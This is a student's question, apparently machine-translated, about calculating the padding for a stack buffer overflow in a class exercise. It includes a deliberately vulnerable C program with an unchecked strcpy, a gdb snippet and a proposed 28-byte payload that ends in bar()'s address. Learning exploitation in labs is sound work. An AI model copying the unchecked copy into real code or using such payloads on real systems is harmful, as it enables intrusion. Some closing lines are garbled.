I'm trying to understand the concept of buffer overflow, and I am having trouble calculating the amount of data that needs to be pushed onto the stack so that it overflows correctly. Suppose I have been given some code (this is not my code, and yes, it is from a class, but this is not a gradient job):
The goal is to get a bar to be executed .
#include <stdio.h>
#include <string.h>
void foo(char *s) {
char buf[4];
strcpy(buf, s);
printf("You entered: [%s]", buf);
fflush(stdout);
}
void bar() {
printf("\n\nWhat? I was not supposed to be called!\n\n");
fflush(stdout);
}
int main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s some_string", argv[0]);
return 2;
}
foo(argv[1]);
return 0;
}
When I parse the bar, I get the starting address of the line:
(gdb) disas bar
Dump of assembler code for function bar:
0x000000000040062d <+0>: push %rbp
I was told that there should be 28 bytes of data in the buffer, and the last 4 bytes should be \x2d\x06\x04\x00
. Where you get 24 bytes to find out how much random data is packed.
In general, and what interests me the most is how to generalize and understand this for any problem.
, , ?
. C GCC 4.4.7